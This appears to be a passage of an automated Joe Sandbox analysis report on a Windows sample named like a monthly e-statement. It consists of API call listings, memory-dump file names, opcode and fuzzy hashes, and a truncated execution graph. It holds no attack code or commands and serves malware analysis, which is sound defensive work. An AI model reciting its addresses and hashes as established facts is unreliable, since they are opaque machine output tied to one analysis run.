                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009A2594,00000000,?,009B1B50,?,?,?,009A2737,00000004,InitializeCriticalSectionEx,009ABC48,InitializeCriticalSectionEx), ref: 009A25F0
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A2594,00000000,?,009B1B50,?,?,?,009A2737,00000004,InitializeCriticalSectionEx,009ABC48,InitializeCriticalSectionEx,00000000,?,009A24C7), ref: 009A25FA
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009A2622
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: f88ee9a6224fb84e4b118667ac796f8fb80eb16094a969c859c3d5b13c17e32a
                                                                                                                                                                                                                                                    • Instruction ID: 60120cd1f7ae642ba49bf30a13d2bc640aa11948df5c68680a77a35fcd68f1e5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f88ee9a6224fb84e4b118667ac796f8fb80eb16094a969c859c3d5b13c17e32a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E04F31A84304BBEF611F60EC06F5A3F58AF52B55F104421F90DE80E6E7A1E954AAD4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue), ref: 009A580F
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue,009AC4D8,FlsSetValue,00000000,00000364,?,009A44F6), ref: 009A581B
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue,009AC4D8,FlsSetValue,00000000), ref: 009A5829
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                    • Opcode ID: 60ca519c3150f679f7cf535e85f320731d02c67a20ea6c5e4295904ea822827e
                                                                                                                                                                                                                                                    • Instruction ID: 13a70a1fccc3f0657b3338608b4c231f7adfd867983ae9b761b95db520d25457
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ca519c3150f679f7cf535e85f320731d02c67a20ea6c5e4295904ea822827e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8401AC36719636ABC7214B6CAC44A577B6CAF077B17120624F916D7141D728DC00C6E0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 009A4EBE: GetOEMCP.KERNEL32(00000000,?,?,009A5147,?), ref: 009A4EE9
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,009A518C,?,00000000), ref: 009A535F
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,009A518C,?,?,?,009A518C,?,00000000), ref: 009A5372
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 546120528-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: d89320121824df4cfd55e132c1e4ed1ca455f6b3cd6d454a184a26a02976b6b0
                                                                                                                                                                                                                                                    • Instruction ID: 7496c7ebcde79e9b7eb46719bebde2c11334df963ca6ee0e96729ce7e93f8c26
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d89320121824df4cfd55e132c1e4ed1ca455f6b3cd6d454a184a26a02976b6b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45516570B04B459FDB208F35C8806BBBBE9EF86300F15842ED0968B262D7789981CBD0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 009A4FBB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID: $kz]G
                                                                                                                                                                                                                                                    • API String ID: 1807457897-3502458879
                                                                                                                                                                                                                                                    • Opcode ID: 33b96f5aa1fd82dc9a5923eb17c9c7010f97124f9e1a336bb5191fd6874a3174
                                                                                                                                                                                                                                                    • Instruction ID: a10273061b4fbbf8b3edc1189ef1083af3ece0aaafad698067e97958f17c05d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b96f5aa1fd82dc9a5923eb17c9c7010f97124f9e1a336bb5191fd6874a3174
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C41F97060865C9FDB218E64CC84BF6BBBDEB46304F1408EDE59E87142E2359945DFE0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 269201875-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: d7d2673bc67b1e436b46d7122da9d9942a4be0f4c5301d844031f6710e2767fa
                                                                                                                                                                                                                                                    • Instruction ID: b8b2ff5b714c3356a0daa41f4a06fd7bacef4d8383b9f7df17c85c5da1b32177
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7d2673bc67b1e436b46d7122da9d9942a4be0f4c5301d844031f6710e2767fa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C41D332A002049FCB10DF7CC895A6DB3B6EF8A724F258569E915EB391D731AE01CBC0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,009A8BC9,?,00000000,?,00000000,00000000), ref: 009A8836
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A8BC9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A885F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 442123175-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 15b742816e4a3128a2d05c2d86a291f6ea214e7f0ac81a451342ec0365beedee
                                                                                                                                                                                                                                                    • Instruction ID: 0d54be163ca77b635e37ef50082252f0b4e8fa8d1608dbc9036eca1e82570a83
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15b742816e4a3128a2d05c2d86a291f6ea214e7f0ac81a451342ec0365beedee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB318F71A00219DBCB24CF59CD80A9AF3F9FF89310B6085AAE519D7250DB34A981CB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,009A8BE9,?,00000000,?,00000000,00000000), ref: 009A8748
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A8BE9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A8771
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 442123175-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 5088ccb9069c7190d0be796ea3902b659c0ef02bad1d6598b8539adabd0107aa
                                                                                                                                                                                                                                                    • Instruction ID: 6da1b225ee2e28d73ad578c52b22f99320db709cfa1b71298a8e39f4ebbdc6e9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5088ccb9069c7190d0be796ea3902b659c0ef02bad1d6598b8539adabd0107aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2182356102199FCB15CF59D980BEAB3F9FB49351F2044AAE946D7251DB30AD81CFA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009A14C6
                                                                                                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 009A15AE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 3761405300-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 9ac2095f05ab1bfd1cc6fd5ae6115d69d0b32482084e83303f6e0210fcb061ad
                                                                                                                                                                                                                                                    • Instruction ID: dd21fba4b8875a6f3914a0e43eeec470596d947d83d54094bcb54e87de6308eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac2095f05ab1bfd1cc6fd5ae6115d69d0b32482084e83303f6e0210fcb061ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B721E2B85283049FE304DF19FAA67813BE4FB09764FA0522AE5098B3B0E7B05480AB44
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 009A5A86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                    • String ID: LCMapStringEx$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2568140703-956137866
                                                                                                                                                                                                                                                    • Opcode ID: e64eb082dfdbb500662ccb5fd3dbd74bd450df9e4e53308b3af823026296286e
                                                                                                                                                                                                                                                    • Instruction ID: 3702b32ec5881f34cbea965ecaa9b1ca6f0cc219110a0be38cf022d8c304d9fa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e64eb082dfdbb500662ccb5fd3dbd74bd450df9e4e53308b3af823026296286e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B01E532644209BBCF02AF90DC15EEE3F66EF4A764F064154FE146A161CB329931EBC0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 009A59FE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                                    • String ID: InitializeCriticalSectionEx$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2593887523-2039192805
                                                                                                                                                                                                                                                    • Opcode ID: 6229decf8385e752a013d50fc00bf255ad1c4034bcc50e6a23578740e1d48764
                                                                                                                                                                                                                                                    • Instruction ID: 83442f690e99586f52e25335e2988e0fd23a441a21d1eb2183666102264e1d16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6229decf8385e752a013d50fc00bf255ad1c4034bcc50e6a23578740e1d48764
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF0E931B8421CFBCB016F60DC05E9E7FA1EF86760F414114FC185E161DB325E21A6C0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _abort
                                                                                                                                                                                                                                                    • String ID: kz]G$kz]G
                                                                                                                                                                                                                                                    • API String ID: 1888311480-861787974
                                                                                                                                                                                                                                                    • Opcode ID: 179250eff9476e38ee4b994581e1e06da864eeb748b2c13fc52ec171f79861db
                                                                                                                                                                                                                                                    • Instruction ID: 51c356d70b3e84f5a2e57e76ec7ac153653d80f84fdf23046a9e7c13b4e07990
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179250eff9476e38ee4b994581e1e06da864eeb748b2c13fc52ec171f79861db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0B4329643049BC714FF78E919B1D37A0AB81731F718225F4149B1A6CB704940A6C1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free
                                                                                                                                                                                                                                                    • String ID: FlsFree$kz]G
                                                                                                                                                                                                                                                    • API String ID: 3978063606-1205607610
                                                                                                                                                                                                                                                    • Opcode ID: ac851cd7a537a86c74df7527a369ea3bd3fa5c133965713974668d5b61a085ee
                                                                                                                                                                                                                                                    • Instruction ID: 1d4b8410ee80c20af647f10a22ee5bd1b85f8567fc6864c905919fe288437ef9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac851cd7a537a86c74df7527a369ea3bd3fa5c133965713974668d5b61a085ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EE02B71B4961CABC3007B549C2AE3FBFA4DF8BB54B42815DFC055B251EE344D01A6C9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                                                                                    • String ID: FlsAlloc$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2773662609-2178684103
                                                                                                                                                                                                                                                    • Opcode ID: d4e7678a1f071f0112ca27179f756e06802ca83970d10fb94b2710b0311c138a
                                                                                                                                                                                                                                                    • Instruction ID: 3db751116b337dc9a83e74b8ee6ced0de60328d0e5d8aa0736f08d611a7b2906
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e7678a1f071f0112ca27179f756e06802ca83970d10fb94b2710b0311c138a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE02B30785218BB83117B64DC26A7E7FD4DF8BB35F424164FD099B250DE744D0195D9

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:17.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:113
                                                                                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                                                                                    execution_graph 26416 7ff848f4bf19 26417 7ff848f4bf2f 26416->26417 26419 7ff848f4c086 26417->26419 26422 7ff848f44c90 26417->26422 26420 7ff848f4bfe6 26421 7ff848f44c90 LoadLibraryExW 26420->26421 26421->26419 26423 7ff848f44cb8 26422->26423 26424 7ff848f44cc3 26422->26424 26423->26420 26425 7ff848f43f30 LoadLibraryExW 26424->26425 26426 7ff848f44cc8 26425->26426 26426->26420 26494 7ff848f4a879 26495 7ff848f472b0 LoadLibraryExW 26494->26495 26496 7ff848f4a887 26495->26496 26501 7ff848f433c0 26496->26501 26498 7ff848f4a8bf 26499 7ff848f44c90 LoadLibraryExW 26498->26499 26500 7ff848f4aa53 26499->26500 26504 7ff848f433c5 26501->26504 26503 7ff848f4378e 26503->26498 26505 7ff848f43c81 26504->26505 26506 7ff848f43cae 26505->26506 26507 7ff848f42e48 LoadLibraryExW 26506->26507 26508 7ff848f43d19 26507->26508 26508->26503 26427 7ff848f4a622 26430 7ff848f472b0 26427->26430 26429 7ff848f4a63a 26431 7ff848f472df 26430->26431 26432 7ff848f472d6 26430->26432 26433 7ff848f43f30 LoadLibraryExW 26431->26433 26432->26429 26434 7ff848f472e4 26433->26434 26434->26429 26401 7ff848f46e0b 26402 7ff848f46e14 26401->26402 26405 7ff848f45990 26402->26405 26404 7ff848f46e20 26407 7ff848f459b4 26405->26407 26408 7ff848f43f30 26405->26408 26407->26404 26411 7ff848f415c8 26408->26411 26410 7ff848f43f55 26410->26407 26413 7ff848f415d1 26411->26413 26412 7ff848f41683 26412->26410 26413->26412 26414 7ff848f41802 LoadLibraryExW 26413->26414 26415 7ff848f41836 26414->26415 26415->26410 26509 7ff848f46c89 26510 7ff848f44c90 LoadLibraryExW 26509->26510 26511 7ff848f46c99 26510->26511 26463 7ff848f4994b 26464 7ff848f49944 26463->26464 26464->26463 26465 7ff848f49a0e CreateFileW 26464->26465 26466 7ff848f49a8c 26465->26466 26467 7ff848f4c74b 26468 7ff848f4c75c 26467->26468 26469 7ff848f44c90 LoadLibraryExW 26468->26469 26470 7ff848f4c7a3 26469->26470 26475 7ff848f4a4c0 26470->26475 26472 7ff848f4c7b4 26473 7ff848f44c90 LoadLibraryExW 26472->26473 26474 7ff848f4c7c2 26472->26474 26473->26474 26476 7ff848f4d350 26475->26476 26477 7ff848f4d460 26476->26477 26479 7ff848f4d3cc 26476->26479 26480 7ff848f44c90 LoadLibraryExW 26477->26480 26478 7ff848f44c90 LoadLibraryExW 26483 7ff848f4d449 26478->26483 26479->26478 26480->26483 26481 7ff848f4d62c 26481->26472 26482 7ff848f4d5db 26485 7ff848f44c90 LoadLibraryExW 26482->26485 26483->26481 26483->26482 26484 7ff848f44c90 LoadLibraryExW 26483->26484 26484->26482 26485->26481 26439 7ff848f4a537 26440 7ff848f4a51c 26439->26440 26441 7ff848f4a543 26439->26441 26441->26440 26443 7ff848f77290 26441->26443 26445 7ff848f772b5 26443->26445 26444 7ff848f773cd 26444->26441 26445->26444 26447 7ff848f4a518 26445->26447 26448 7ff848f77510 26447->26448 26449 7ff848f44c90 